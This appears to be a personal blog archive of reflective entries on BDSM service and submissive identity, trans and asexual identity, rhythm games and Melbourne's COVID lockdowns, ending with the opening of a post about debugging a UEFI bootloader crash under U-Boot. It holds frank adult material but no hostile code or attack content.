There are all sorts of reasons why people might consider service worth doing even if it isn’t attractive on its own merits. A live-in houseboy or housemaid might clean the house because they’re getting free rent and a certain amount of dominance from a trustworthy M-type. A part-time sub might fetch their dominant drinks at the bar because they know they’re going to get some kinky action later, or because it adds to the fun of temporarily imagining themselves to be a slave, forced to serve or else something vague and terrible and titillating might happen. Another might serve because it gets them the appreciation of the people that they’re serving, and they like to know that they can make a positive impact on the lives of others.

Every power dynamic should have at least a small amount of transactional motivation, because it keeps the servant in touch with their needs and whether those needs are actually getting met. If the servant is no longer getting what they need and what they believe that the master is obligated to give them, they’ll become resentful and eventually leave. This is one reason why it’s good to have largely transactional relationships clearly delineated; the master needs to know what the servant believes that they are supposed to be getting from them. Sometimes these relationships are built entirely on assumptions, and if those assumptions are not in line with each other, it will fail very quickly. Of course, this also means that the servant needs to be completely honest – not only with the master but with themselves as well – about what it is that they expect from the bargain. With straightforward honesty, this kind of service can work out very well in a long-distance relationship, or one where both parties can only see each other periodically, where the other motivations would be more painful and difficult.

One of the drawbacks to transactional service is that while it can work very well for short-term encounters, it’s not so useful for long-term, 24/7, emotionally intimate relationships where boundaries can blur and “rewards” can get put off due to the vagaries of life interfering. The constant “accounting” gets tricky when it’s every minute of every day, and sooner or later someone will start feeling shortchanged. Another drawback is that this motivation can only be pushed so far, as it is easily swayed by personal desires and selfishness. It’s not necessarily the best foundation for a property-ownership situation, for example, or a no-recourse commitment where the slave is expected to be there permanently.

Devotional Service

Devotional motivations for service happen when the submissive serves out of love. It doesn’t have to be romantic love – although it often is – but there is usually a feeling of “You are such a wonderful person that I am moved to do things for you, and I want very much to please you and to make you happy.” Deep satisfaction is gained from helping the object of their warm feelings, in a way that wouldn’t happen if they were rendering that service to some random person.

Love is an amazingly strong motivation, and can carry someone a long way in the face of difficulty. Therefore, this motivation lends itself best to long-term romantic relationships, and secondarily to relationships where the sub looks up to and admires the master as a person. There may also be a desire for the feeling of “belonging” – to a person, to a family, to a cause. Since devotional service is usually very one-pointed – “I serve you and no other!” – the master needs to be very careful about lending their servant to others. Long-distance relationships are the hardest for someone with this motivation, for obvious reasons.

The drawbacks to devotional service is that inevitably, a day will come when the servant doesn’t feel all that loving, and may decide that service isn’t being rendered on that day. We’re all human, and eventually every couple – especially if they are living together – has a moment of “Damn it, today I just hate you!” Even if they get over it in a matter of hours, during that time their service will often be sabotaged by the lack of positive feelings. This can be particularly problematic with the combination of an emotionally volatile servant and “mission critical” tasks. A servant motivated primarily by devotion would do well to cultivate a little of the other two types of motivation to pull them through the “I hate you today” mornings.

Positional Service

Positional motivations for service come from the servant’s strong sense of identity of themselves as a service-oriented person. They serve because it’s part of who they are, and to refuse to serve would be to sabotage their own self-worth, which is often based on how well a job they do. Positionally-motivated servants take pride in serving as perfectly as possible, and they are the ones who get up to help because it needs doing, regardless of who is asking. They are the most likely to attempt to cultivate “pure” service, treating it as an art and requiring little in the way of appreciation. This category is the “ideal” slave in Laura Antoniou’s fictional Marketplace series, where slaves are sold to random wealthy owners who may or may not be even remotely worthy as people, and the slaves are expected to serve their monied masters to the best of their ability anyway. As you might imagine, positionally-motivated servants do “lend out” quite well, should a master want such a thing.

Putting the chairs away after the BDSM potluck munch for the fiftieth time won’t fly for the transactionally-motivated servant (“What’s in it for me?”) or the devotionally-motivated servant (“I don’t love you; why should I do what you say?”), but the positionally-motivated servant will get up and do it anyway every time, because it’s what they do. It is central to how they see themselves. However, one of the drawbacks to being a positionally-motivated servant is that their need to serve anyone, anything, for their own self-worth, can get them taken advantage of by unscrupulous people who want something for nothing.

Another drawback to this motivation is that it does tend to objectify dominants and perhaps see them as interchangeable. In contrast to the devotionally-motivated submissive who is fiercely bound to one particular person, the positionally-motivated servant may be happy to serve anyone for the sake of the service. Alongside the potential problems of choosing a less-than-worthy master, they might also irritate some dominants with their seeming lack of caring about whom they serve. Many dominants want to be seen as special, at least by their submissives, and they may be put off by the idea that they might as well be anyone else who would accept the submissive’s service. Adding a bit of devotion to the mix will help in that regard, and cultivating some transactional motivations will help to keep them from being taken advantage of too often.

zashchitnitsa

2021-05-07T00:00:00Z

I was away, in my own head.

In the imaginal, I was yours. You’d given me to Audrey for a night, who in turn used me very, very roughly, late into the night. The next morning, she met with you for coffee, slave girl in tow — who’d been very good, she assured — and you received me back.

In the real — just minutes later — you addressed my subconscious, asking me to let you protect me in my dreams.

And in a funny way, you just had. As another has written before me:

I can’t not be submissive, whether owned or unowned, whether actively dominated or not, whether bound or free. My constant inclination is to submit to any other person around me, which apart from a slave master or mistress, is dangerous and leaves me susceptible. For me and others like me, there is a saving grace in being owned by another, for then I am protected from my own submissive vulnerability.

Being given was protection, for in that world I was yours to give; the comfort of being given — that of knowing one’s place to begin with.

p

2021-05-07T00:00:00Z

My god, progesterone turns me into such a bitch. Literally over night. Guess the world has to deal with this for the next two weeks.

siriai

2021-05-06T00:00:00Z

Geez. I even knew a slave girl!

Worked with her; gave her a lift home more than once! Saw her at PAX a decade later. I suspect I follow her on Instagram even now. At the time I simply didn’t understand.

kutuzyoku

2021-05-05T00:00:00Z

I am not sure I have experienced submissive humiliation. This is probably the next thing to ascertain.

kept

2021-05-04T00:00:00Z

I’ve always wanted to be kept.

For as long as I can recall. My very first long-form creative writing endeavour (age 7) was an obvious self-insert; an anthropomorphic rabbit, kept. Collared in all but name; a wrist cuff, unable to be removed. In a cell, somewhere far away.

Fantasies of being like Mewtwo in the first Pokémon movie, kept in a lab somewhere, never let out. Actually trying to roleplay that out at a friend’s once (age 9ish). He thought I was weird. I guess he was right. We stopped hanging out.

There was the time I had a different, much closer friend literally tie me to his bed (age 13; what we had on hand to effect this purpose was, uh, socks). Cue EXTREME scrambling to cover this up somehow when his mother well-intendingly burst in at the late hour that it was. I should ask him what he made of my asking to do that at the time.

Hell, it’s not a stretch to see it in the way I’d given myself to romantic relationships up until a few years back. Total abnegation of the self. The subconscious rebels, though, because what I want to give is not even what the most possessive of my partners wanted to take. Not that I really had a clue about myself then, either; it was all these strange, wordless longings, and they’d seem to contradict themselves in ways I couldn’t grasp.

The most frustrating thing was always myself, in the end.

This quest for self-knowledge in earnest has been apace for more than 18 months, now, and I think we’re approaching the last crescendo before the home stretch. Not to suggest I’ll be ever truly finished with it, by any means, but once I’ve found it — once I’ve locked eyes with my soul and listened — I suspect that same, once-eternal dread of facing up to what I’ve made for myself will no longer feature.

And maybe I’ll find myself a keeper or two.

summarised

2021-04-30T00:00:00Z

For me, the pleasure comes out of being obedient, and doing it really well; being used for others’ pleasure, and putting in a lot of effort.

At the moment I find a lot of pleasure in the idea of, I guess, being someone who holds herself in pretty high regard, but is regardless so willing to be used and to devote herself to that, if that makes sense. There’s a kind of humiliation in that which makes me super blush-y to think about.

submission

2021-04-27T03:49:00Z

“finding your submissive self” by shae hits so hard it hurts.

Transcluding here for our future study and contemplation, emphases mine. The degree to which most of this is felt is unreal.

(The one exception is vis-à-vis degradation, but that’s not something I feel an acute absence of, but rather a questionmark regarding. There’s a big extent to which I wonder how much I inhibit my own desires due to internalised shame — it’s not something I feel on the surface, nor is it an emotionality most would associate with our public personae.

So it’s not that I don’t desire degradation, or that I do; not that I don’t know shame, or that I do. Just that I have no insight into it one way or another. What does resonate in that part is reference to needing that which I would protest to; indeed, one of my peak submission experiences so far was one in which I was helplessly trying to object to what was happening, so much so that my body was acting under its own will, trying to push away the dominant; me, awkwardly trying to tell her that despite this, I wanted her to continue.)

Recently I’ve used this phrase in some of my posts. I thought I might look at “finding your submissive self” through the lens of my own life.

I’m going back about eight years to a time before I was in a D/s life. I was in my real estate career, living a very vanilla life, dissatisfied and not sure what to do. I had been aware for some time that I was submissive, though naïve about it, but now I was beginning to think about it as more significant in me than I’d realized before.

I made a lot of mistakes in my early exploration of my submissive sexuality, but maybe this was something I did right: I dedicated time to assess my submissive feelings and inclinations — sort of a personal, submissive inventory. I really focused on it. That sounds so Tony Robbins, but for me it was less of a self-improvement technique than an inner exploration about strange desires I just needed to figure out.

Probably the most obvious thing to me then was my persistent longing to be obedient in an extreme way. I couldn’t make sense of that, but I knew it was there in me. “Obedience” to me wasn’t simply about being a follower, nor was it about being, say, a housewife in the old traditional sense, deferring passively to a husband. My longing was something else, deeper and more extreme. Of course back then my definition of “extreme” was more modest than I consider it now, but even then I had a clear sense that my longing required something beyond normal.

I remember being at parties with real estate colleagues, sitting and sipping cocktails. A particular man there, just by his presence, compelled certain submissive feelings in me. I remember having a longing to sit on the floor at his feet. In the social context there that would have been so inappropriate and odd, yet I wanted that, maybe precisely because it would have been a socially embarrassing demonstration of my obedience. I didn’t even know the man.

I realized as well that my submissiveness also involved the desire to be taken into experiences I never could or would take myself. At the time, I couldn’t specifically identify what those experiences were — I was too new to it all. But I had a palpable sense that I needed someone to command my being and push me into life events of doing and being that were otherwise beyond me.

At the time, I was also going through a kind of sexual awakening. I’ve written many times about how my sexual development was repressed in my early years, and so I was at twenty-seven just beginning to open up sexually to who I was. This led to a brief but serious relationship with a man and also a girl-crush on a colleague of mine, which led to my first sexual relationship with a woman.

But I was given advice from someone, I forget who, to imagine my submissiveness apart from my sexuality and any sexual experience. D/s, it was said to me, is not about sex, but about a radical abandonment of one’s self to another’s dominion. The point was that as I assessed my submissive self, would I still feel what I felt submissively if I took sexual attraction and sex itself out of the picture?

As I worked this through, my answer was yes. That desire to be “taken into experiences I never could or would take myself” was not primarily, to my mind, about sex. I could imagine sexual things, yes, but it was for me really about a different kind of relationship in which I was treated in a non-traditional way, taken into life experiences of submission and obedience — again, admittedly, vague and undefined. My submissiveness just had a craving sense these “other experiences” awaited me out there.

The further realization I came to was troubling to me. But it was strong and unavoidable. It was, simply, a strong wish for my own degradation.

What I didn’t know then, but believe now, is that this is possibly the core of submissive psychology. My submissive desire was to be humiliated and degraded. I didn’t feel this to be a kind masochism, a “hurt so good” desire. It was different. It was something I would likely protest and object to in reality, yet something I knew I somehow needed. Again it was ambiguous as to what and how (indeed, in my writing now, I’m still trying to figure this out), but it was a strong, driving submissive desire in me. Troubling but true.

There were other things too, other evidences, such as how dominance in persons across a crowded room would somehow melt me, and how I started to imagine myself in a kind of servitude to particular men or women. Traditional people’s fantasies look like a Hallmark movie, mine looked like “The Story of O.”

It took a long time. I was sorting out my life in a handful of different ways — my relationship with my mother and my father, my beliefs and faith, my bisexuality, my career and why it was disappointing… and now this, my submissive nature, which started to loom as a bigger reality in my life than any of the others.

My “submissive self-assessment inventory” took me about a year and a half. It was never so formal a project as that, but that’s kind of what it was. It yielded the self-revelations I share here, but slowly and often messily.

At a point, I started to accept my being submissive. And then becoming open to being extremely submissive. And then allowing myself to identify primarily as a submissive, taking on the label, allowing myself to be defined by it: “My name is Shae and I’m a submissive.”

There were still questions for me to figure out. Namely would my submissive identity need to be a full-time life? And then, how to find a dominant person who would take me places I couldn’t take myself.

But I came to this point when I was twenty-eight where I could say I found my submissive self. I knew this is what I was.

Do I know what I am?

You Got Me

2021-04-27T00:00:00Z

You Got Me by USAO & Shandy Kubota

vacillation

2021-04-27T00:00:00Z

We waver—between passivity and anger, steeped rich in disappointment; between a resignation blended with hope that this could be enough, and a rejection, filled with the knowledge that we are worth more than this.

It is hard to know whose is whose.

occlusion II

2021-04-27T00:00:00Z

I suspect the answer is “submission”, “submissiveness”, or even “being a submissive”—not just an occasional partaker of, but as core.

What am I if not someone that earnestly desires?

Fuck, man. Those words formed themselves without my input. There we were, not long ago at all, contending with the issue of having no contact with our desires, of not knowing at all. There’s embers smouldering under wraps, and I think it is f i n a l l y time to fan those flames fully.

What, if accepted, would let me go even further in my quest for self-knowledge?

I’m inclined to believe that all my identity labels can be bound up in one another; that each can be a lens unto the others. If it’s not obvious, it probably just means there’s a surprising takeaway to be found. I don’t mean to be dogmatic about it, but let’s run with it and see? Quoting our homepage:

Trans. Well, this one’s kind of obvious. (You have to admit some gender essentialism, but this kind of ~~lens work~~ necessarily admits essentialism on every axis it looks at. I think that’s unavoidable.) tl;dr: gender, with all of its norms, ascribes submissive, obedient behaviour to one of its two main categories. Doesn’t take much thinking to realise which. If I were born cis, I don’t think I’d be trans. (Which is a funny way of validating my transition choices, really.)
Plural. Developing plurality gave my identity the flexibility and leeway it needed to lean into new spheres. A lot of our internal work has been developing an internal sense of obedience; of testing out and playing with the idea of one of us (Ashe) being subservient to the other (Lia). Wherein Lia’s been acting as the frontrunner of our identity, this inner-play has been one way of promoting behaviour in the main front, Ashe; the identity we desire to embrace is that of a submissive, and so we provide space within for Ashe to submit. Lia’s dominance isn’t fake, but it’s also not the goal here; it’s a scaffold. Frontrunning is complex; here it’s closer to shaping.
Poly. This basically indexes “non-traditional relationship style”. I think the Venn diagram of relationship escalators and compatibility with the depths of my submissiveness are two completely separate circles.
Furry. I’m a fucking bunny. This identifier alone got us into our only actual correctly-oriented D/s relationship so far—“so, the bunny thing written on your AD account… is that like, a kink, rope-bunny thing? or a furry thing?” “well.. I only really meant the latter when I wrote it, but the former too now that I think about it?” nek minit I’m tied up on her living room floor.
Asexual. This has taken quite some time to resolve completely, but exploring it in depth has provided clues, maybe even answers. Asexual as in “doesn’t experience sexual attraction”, yes. But even a hint of dominance, of assertion, of even just presuming that part of me might be yours to take, and I am suddenly extremely, intensely needy. As with almost every part of my self that I’ve come to embrace, “subsexual” is the kind of term I would have scoffed at even just months ago. Now I think it’s probably the closest thing to a ‘sexual orientation’ I might possess. I get turned on by submission, by obedience, by enforced compliance; by boundaries disregarded in a wider context of consent. By accepting what I am; by being brought to that acceptance.

We’ve a lot to contemplate.

MAX 300

2021-04-24T00:00:00Z

MAX 300 was the first¹ level 10 song I cleared at the arcade. I learned to play DDR with my older brother; I distinctly recall the sensation of finally being better than him at a game—whether it was Descent, StarCraft, anything, he always had such a lead.

I started DDR a bit later than him and had some catching up to do, but eventually crossed the level 9 mark before he did. It turned out rhythm games would be a good place for me to excel.

He lives overseas now, and at some point got an L-TEK DDR pad. I was a bit envious, but felt the shipping expense—far worse to Australia than the US—was too hard to justify. Pandemic closing the gym made it muuuuuch more palatable, and plus it’d mean I’d get to play DDR with my brother again in a way.

It’s been a very good way to get fit again, and hitting old milestones again is a lot of fun. I’ve done some other harder ones already, but today was the day for clearing MAX 300 again. My scores are much better than my 13-year-old self’s, even though my endurance isn’t.

Not counting 桜 or bag here. ↩

mouii

2021-04-23T00:00:00Z

I’m fucking sick of feeling like I’m talking past everyone; like none of my words actually register.

I don’t know if it’s this pandemic or what, but so decreasingly do I get the impression anyone cares to actually see me, to communicate soul to soul, real living being to real living being. (My nestmate is a beautiful exception, but then that’s why we’ve endured as we have.)

I’ve had it with lowering the bar. Fucking get on my level.

recapitulating

2021-04-21T00:00:00Z

Cleared PARANOIA survivor (new 15, old 10) again today. After re-clearing Utopia (11 from ITG) a week ago, I think I’m finally up to where I was a decade and a half ago!

cycles

2021-04-19T00:00:00Z

There’s something distinctly cyclical about how I’m relating to others and my goals at the moment and I don’t know how to attribute it.

Energy for creative output has waned — just wanna play games. Don’t care to see others or meet new people. I’m at the tail end of my P cycle so we’ll see what it’s like later this week when I’m off that again. I have quite a lot of socialising coming up and I want to be there for it, otherwise it’s gonna get annoying.

inscrutability

2021-04-06T00:00:00Z

Sometimes I wonder if I let myself get pushed or pulled around by dreams too much, but there’s something appealing about the inscrutability of allowing yourself to follow a path that’s been opened up for you, rather than demanding to try to understand one’s every little motive. Most of our reasoning’s made up post-hoc anyway, right?

(quoted from an email I sent a little while ago)

impinged

2021-04-04T00:00:00Z

Feeling miffed at someone’s suggestion that I wouldn’t be committed to communication, ‘as a sub’.

There are lots of reasons why this would miff me so!, but, to demonstrate the most pertinent one, the rest of this entry will detail the entirety of the communications I have received from them so far.

one step forward

2021-04-02T05:46:00Z

One Step Forward — Nhato feat. Glascat (transcribed for Vivian)

Oh, oh

There is something strange inside my head
Something turns and runs from me
If I look back now what would I see there following?

Can I withstand it and make it through to the light?
If I turn back now then this will always follow

There is something strong inside my heart
Something deep, unwavering
If I breathe in now then I can’t find that part of me

Can I demand it and make it last through the night?
If I wake up now then I can’t find the future

Oh, oh
Oh, one step forward, forward
Oh, oh
Oh, one step forward, forward

Oh, oh
Oh, one step forward, forward

‘cause the fear will take me if I let it in
I must not, I must not, I must not, I must not let it in
And the light will make me if I reach the end
I will go, I will go, I will go, until it shines again

Oh, oh
Oh, one step forward, forward
Oh, oh
Oh, one step forward, forward

Oh, oh

pull

2021-03-31T00:00:00Z

I had a great deal of energy pushing me toward working on a kernel project after I came off the mood stabiliser. Having readded some testosterone to the mix, and..

The energy remains in some sense, and I could choose to devote it to the kernel, but I feel more inclined to simply be helpful on Discord to newcomers, and then put my energy toward language learning.

toki pona seems fun, but watching the conversations going on in ma pona it’s clear that its function is (intentionally) limited. I yearn for something greater, wider, deeper; of a depth not decided by the conventions that can only arise from mutual conversation with those present, but one with its roots thrust into the past.

Russian I continue to learn at the speed of my nestmate, so I will rededicate the energy I have now toward the language of my ancestors; mu emakeel, so to speak.

I thought to resist the pull, but following it has been fruitful lately, so I’ll continue to let it guide me xx

occlusion

2021-03-31T00:00:00Z

I was contemplating (intentional/endogenous) plural identity formation, and it occurred to me how much in common the mindstates before and after have with trans identity formation.

When I think back to who I was before I’d really accepted myself as being trans, I had all the usual hangups: what if I’m faking it, what if it’s not actually better, what if it’s grass-is-greener, what will my family/friends think, etc. etc. There was something basically obscuring it, and yet — while many aspects of my material reality have surely shifted in the decade since — internally the changes are not huge. The most prominent one is simply identification; a willingness to see the self through a given lens, followed by the confirmatory euphoria of knowing truth.

There’s nothing fundamentally different about questioning-me and knowing-me, just a change in what I’m willing to accept about myself.

It was much the same with plurality. It had long made sense as a means of better understanding my self, but before you cross the gap (which really takes place in lots of little ways, rather than one leap, but some of the little ways are bigger than others), doubt fills your mind and occludes those moments of recognisance. Even though it “made sense” even stronger was the sense that it was generally thought to be a faked phenomenon (sound familiar?), one with no real value other than to seek attention.

I wonder just how many possibly useful lenses are hidden this way; in general, and for my selves specifically. What, if accepted, would let me go even further in my quest for self-knowledge?

blocked

2021-03-31T00:00:00Z

I’m incredibly blocked at work.

~~Circumstances~~ mean that there’s a large drain on motivation, and the piece of work I’m up to right now I haven’t really budged from in weeks. Months? Working part-time has its benefits, also its downsides.

How much longer can this go on?

longing

2021-03-29T00:00:00Z

I dreamt of her, fractally.

I dream of her often enough, but lately the edge had been taken off, no heavy meaning invested, instead accompanied by a casual lightness that never really graced our actual relationship with its presence.

This time, though, it was her, her, her, and me, apologising, reaching through one dream and into the next to try to make contact, to establish some connection, to get the message through that I wished more than anything it hadn’t gone that way. In one level she had bleached her hair, same as me; we were dancing in a circle and Niki (?) pointed her out to me, just behind me.

At the end of the dream I was apologising to Niki, saying I needed to go out on a motorcycle ride with her at short notice, having finally reconnected.

Ugh.

As best we can tell, the pub is shut

2021-03-29T00:00:00Z

I was alerted by a commenter that it’s been more than a year, now, since this video dropped:

COVID measures had already begun to be implemented; national borders shut, most schools already closed. Watching this press conference, a scene from The Simpsons played in my mind. I’d been getting a little comfy with a video editing program to record IIDX plays, so I gave it a crack.

I don’t really have networks to tap, but Niki liked it so much she diligently dropped it into comments on Facebook and Twitter replies wherever it seemed appropriate. Before I knew it, I had a moderately popular YouTube video. It entered the popular discourse when it was further remixed, but if you ask me, the Trump oversamples are just kinda gross.

One thing that’s been interesting to see has been how the popularity of the video corresponded with (literally) viral events:

The three major events were:

Late March, video released, Dan Andrews said “get on the beers”.
Mid-May, first lockdown restrictions eased.
October 26, Victoria recorded zero new cases/deaths for the first time since June. Dan reported that he “might go a little higher up the shelf” than beers.

Daniel Andrews, Victoria’s Premier, is widely liked, and he’s largely been credited with producing the results we’ve had locally, the likes of which have only really been seen in Taiwan, New Zealand and Singapore. We’ve had our share of anti-lockdown protests, too, but overall the sentiment has been that Victorians have been willing to accept discomfort up front to mitigate a disaster later.

Sharing this video online more recently has had some interesting reactions; namely, Americans being like “lol government interference!!!” Melbourne’s second lockdown was 112 days long (July 9 until October 28), and it was challenging in its own ways, and for some very difficult. I don’t seek to deny that, but the practical upshot has been a few dozen cases in the last six months.

It’s a fucking pandemic. You don’t just ask everyone nicely to please do the right thing, because that’s not human beings work at the population level. If you actually want to beat it, you need to be realistic about what works. Ideals fall flat in the face of an airborne pathogen. If there are any doubts about that, please consult the big red number at the top left. Empirically, government interference gets it done¹.

Someone in chat a couple weeks back lamented how they wish they could go out again like normal, and I didn’t have the heart to tell them that I had been for nearly half a year now, safely; I just said, “in some places in the world you can. soon!” Y’know, vaccinations proceeding apace and all that.

Another person agreed, saying Japan was reopening for dine-in in a couple weeks, and the first said how much they wished the borders were open so they could visit. Japan reported 2,080 new cases this weekend, a steady increase from the most recent low 7-day average of ~900 in early March.

That’s not what I meant.

Never mind the fact that, say, Australia and New Zealand both rank higher in the Human Freedom Index than the US—what matters is how you feel when you say it! ↩

hostility

2021-03-25T00:00:00Z

Maybe it’s just the elevated T levels lately, but god if I don’t feel a lot of animosity towards certain behaviours.

There’s this one guy who’s just joined a programming language community, and like:

He doesn’t really understand the language or its motivations yet, is trying to learn, but is way out of his depth still. That’s cool, so was I once.
Despite this, though, he keeps trying to “help” people in areas he is still way out of his depth in, and like, should definitely be aware he is out his depth in. Blind leading the blind.
When something doesn’t make sense, he starts going wild saying how it’s stupid, must be a bug, starts @mentioning the creator (who probably isn’t even online) saying “please tell me it’s a bug”. I hand-hold him and explain how, no, he’s just got it wrong, he calms down. Why be so belligerently wrong about something?
In various chat rooms people will be discussing using certain features (or not using them) and he’ll start just kinda circlejerking with no-one in particular about how good it is that the language lets you do this, “unlike CERTAIN OTHER LANGUAGES”, but like, dude, shut up, we’re trying to have a conversation here?

It takes every fibre of my being to not be like “ok, just shut up,” but I’m thoroughly irritated after a few weeks of this. The last one in particular is one I see a lot from new entrants to this community; they barely understand it but they have decided it’s the best thing ever and for some reason feel a need to go on about that, rather than just.. actually use it and make something.

Maybe I’m hostile to the idea of people deciding to invest themselves in something they don’t understand well yet, perhaps because when I was young I did a lot of that while casting around for places to hang my identity up on.

collared

2021-03-15T05:55:00Z

I dreamt a dream that has left me unsettled all day.

backstory Ⅰ

Since I first had any kind of sexual inkling whatsoever — which is to say, since I was 12 when I’d hang around on an 18+ BDSM-themed furry MUCK and began RPing — I only ever had any inclination to be in a submissive position. When I found randoms to RP with, it was Asherah, the small pink bunny girl, wanting to have anything and everything done to her, especially if consent lines got blurry.

Even then I had to power-bottom a little bit. One rando I recall was only into the most vanilla dynamics, whereas I kept wanting to up the ante. (Tie me up! Get creative with things! Don’t just fuck me, for christ’s sake.) I got bored.

I also kinda.. baited an IRL friend who was a little too obsessed with me into joining me on the server, and then kept trying to “suggest” him into doing stuff to me. (I’m not especially proud of it, but like. I was 12, he was 13, everything at home was completely fucked up, he was super into me and could match my intelligence to boot, so.. now that we got furry MUCK-married, couldn’t we furry MUCK-do-other-stuff too please?)

This positioning of myself carried pretty strong for a while. There is probably a (bidirectional) link between that and trans feels. It’s funny how predictably some things go; I was ostensibly into girls, not boys (never mind the actual physicality that existed between me and aforementioned IRL friend for a while), but then I became a trans girl, and so liking other trans girls is only natural, and then you stop seeing “dick” as a possibly unsettling thing ‘boys’ have (and you’re not sure about your own) but a hot thing girls have too, and then you look at boys and you’re like, hm. You sure could overpower me.

backstory Ⅱ

Despite this, in relationships since I have often ended up being the one with power. Perhaps stemming from the same instinct that led to power-bottoming before, I’d much rather we get anywhere than nowhere, and I have a kind of.. exuberant personality that tends to draw in others who prefer to follow. I am naturally extremely protective, quite opinionated, have mom-vibes, and until recently have been a people-pleaser to a fault. Not knowing myself how to separate these qualities from those of a ~dominant~ has lead to me getting into places I’ve later not known how to deal with.

This mainly became a thing in two relationships, collectively spanning seven years, or a majority of my post-transition life so far.

In the first case I had a handle on life in many ways she did not yet (she was quite a bit younger than me), and so I provided everything I could; housing, a stable life away from sometimes violent parents, support for her relationships and hobbies outside me, and later when I could afford it, university education.

I’m a person who just wants to give, and as I’ve discovered lately in therapy, one who doesn’t believe, strictly speaking, that I actually deserve nice things. Accordingly, giving nice things to other is a very sure route to getting a similar sense of happiness, effectively, even if it does ultimately mean I don’t get what I truly want, and ends up being unsustainable. She didn’t want many responsibilities of life and liked the sound of a more formal and continuous D/s relationship, so I agreed to give it my best. Our relationship did not last the dissolution of the D/s layer of it (among many other issues, but this came to represent a lot about it).

In the second case, she was a few years older than me, but with a heart of absolute gold who had been mistreated a lot, both historically and more immediately. She nurtured a rare kindness and trust despite all that and I felt so much like I wanted to safeguard that. As our relationship quickly deepened she wanted to know if I would be her “protector”, and I assented immediately. (And I still do. <3) Then in natural order, more D/s-style parameters followed, and I put my all into it as well. It just seemed to make sense, and I had already so much of the “technique” down that the lack of deep-felt enthusiasm for the role seemed of secondary concern for a time, or not even—completely masked. I couldn’t feel that I didn’t have my heart in it, only that I wanted to make her happy.

Once you get used to ignoring what you want for a long time, you lose touch with it entirely. It took a massive reconfiguration of our relationship to accommodate removing this part of it — it had been in place from not even a month after we started dating, and there we were some year and a half later trying to imagine “us” without that. It was the best, most correct decision, but I still wish I’d figured this all out long ago and spared her the hurt.

There was one relationship in the past where I was explicitly the s to someone else’s D, but we lacked harmony regarding what each of us wanted out of a D/s relationship, and I found myself pushing for more than she wanted to give (or, well, take). It was fun being a rope bunny, though.

backstory Ⅲ

What triggered the reconfiguration was my own realisation of my asexuality. I’d been slowly putting the pieces together for a while, and then one well-timed acid trip and I just kind of blurted it out, at once feeling the surge of unverifiable truth. As I experienced a moment of serenity, my partner a sense of loss of what was. The relief of no longer feeling beholden to the allo norms of sex-having then prompted the follow-up question of whether I still wanted to be her dominant. The writing had been on the wall for a while, but it was then that the jig was finally up and I seized the chance to say “no”, as painful as it was. Pretending to be something I was not was behind me.

Living a mostly sexless life has been so much better for me. I just don’t have interest in being sexual with another, and just barely more interest in being sexual by myself. Still, it was in my own fantasies that my sexuality originated, so it’s not too surprising that it does live on there a little.

Last year I saw an endocrinologist for the first time since starting transition (which seems super dumb in retrospect but what can you do, trans healthcare is a mess), and we discovered that both my E and T levels were way too low. My E was below the very conservative range put forth by the Australian medical establishment (and well below what Americans would consider normal), and T levels at almost absolute zero. Even in natal women, T is in a clear non-zero range, and completely lacking it could explain a lack of libido, which certainly described me, as well as lack of energy in general.

So I set to correcting my E levels, then T levels. I’m now on ~3% of the anti-androgen dose that I used to be on and my T levels have just slightly inclined upward. They are still below the low watermark for “normal female levels”, but at least I get a reading.

I still don’t have any interest in being sexual with others, even though I’ve had an inkling of a sex drive for a little while again now, so it doesn’t look like the asexual descriptor was particularly linked to my hormones, but I’m increasingly feeling a need to have some kind of a sexual relationship with myself again.

the point

Last night I dreamt a dream — many, actually, with complicated interconnections, people I didn’t recognise, other people who seem like maybe they’re stand-ins for real people, a variety of settings, some drama unrelated to all this.

But there was one “segment” of it that left an indelible expression, because it seemed like my unconscious needed to make a point.

To date, I’ve never been collared by someone else in an impactful way. The tangible, real sense that you belonged to someone else now — even if time-limited or otherwise scoped. The understanding that it was not yours to put on, or yours to remove, even if it was very much your collar. I have (attempted) to provide that experience for others, when in reality it was what I wanted myself. I’ve “self-collared” a bit here and there.

In one distinct dream, I was collared. I was strongly aware I was collared, and moreover, I physically couldn’t remove it even if I wanted to. It was locked. It wasn’t up to me, and I just had to deal.

It felt really, really good. There was a sense that people might notice it, that they might point it out to each other, and that I was literally powerless to do anything about it. If I wanted to go about my day, I just had to accept that this was my lot.

I’ve never felt that before—that powerlessness. Yet it’s what I’ve wanted all along.

The dream then offered a counterpoint.

Later, somehow, the key came into my possession. The dream didn’t describe the actual supposed holder of the key, but the narrative seemed to be that whoever had collared me needed me to hold onto the key now, too. I wanted to be sure not to lose it, so I put it on a necklace.

The feeling was radically altered. Having the means of unlocking it on my person at all times meant it just became jewellery. It was no longer an aspect of control over me, just some ring with a finnicky clasp. Being out in public and being seen wearing it wasn’t a demonstration of someone else’s power over me, just my own determination. Frankly, as a trans person, somedays being seen in public at all can require a fair bit of that. This feeling barely registered, the same lack of impact that self-collaring has. I can always just take it off.

I want to feel that first one again.

Knowing when to look past your code

2021-02-28T00:00:00Z

There’s a weird tension in programming — on the one hand, as you learn the ropes, you (hopefully) learn very quickly that the problem is almost always in your code, and not, say, the compiler, stdlib, kernel, etc. This is usually very correct; the people who’ve worked on those things have many times the experience you did when you decided that there must be a bug in printf or something.

You’ll later realise you tried to print something through a pointer to a stack-allocated variable that’s long since gone. These accusations tend to wane as you gain familiarity with your subject matter, and wax as you step out into lands populated with ever more footguns, exposing more of the architecture than you ever suspected was there. (See also: the emails from me to the libev mailing list in 2011.)

At some point, though, your journies will take you to places where things aren’t so clear cut, and you’ll start to gain a sixth sense; a kind of visceral experience that things are not as they have been promised to be.

A few weeks ago, that sixth sense whispered in my ear: “what if, instead of your cruddy bootloader written in a pre-1.0 systems language for a platform you don’t fully understand, it’s the 20 year-old project with 80,000 commits that’s wrong?” And it was right.

Daintree’s bootloader, dainboot, worked great on QEMU, but would fail hard and fast on hardware with synchronous aborts. It’s a UEFI application, which means we get a lot for free – see how easy it is to search connected FAT filesystems for binaries. I don’t particularly want to spend much effort on a bootloader, so this makes sense to me.

QEMU comes bundled with a build of TianoCore EDK2, which makes it really easy to get started. On my ROCKPro64 I have a build of U-Boot installed to the eMMC, an extremely versatile bootloader found on all kinds of devices¹. It makes a TFTP-based development cycle remarkably pleasant.

But different bootloaders mean very different execution environments. For one, EDK2 seems to execute the UEFI application in EL1, whereas U-Boot gives over control in EL2. There are many, many differences in the state of the various system control registers. And in this case, right in the beginning, we were getting an exception in U-Boot before we’d done barely any work:

Booting /efi\boot\BOOTAA64.efi
AC"Synchronous Abort" handler, esr 0x96000010
elr: fffffffffd1c4d98 lr : fffffffffd1c4d5c (reloc)
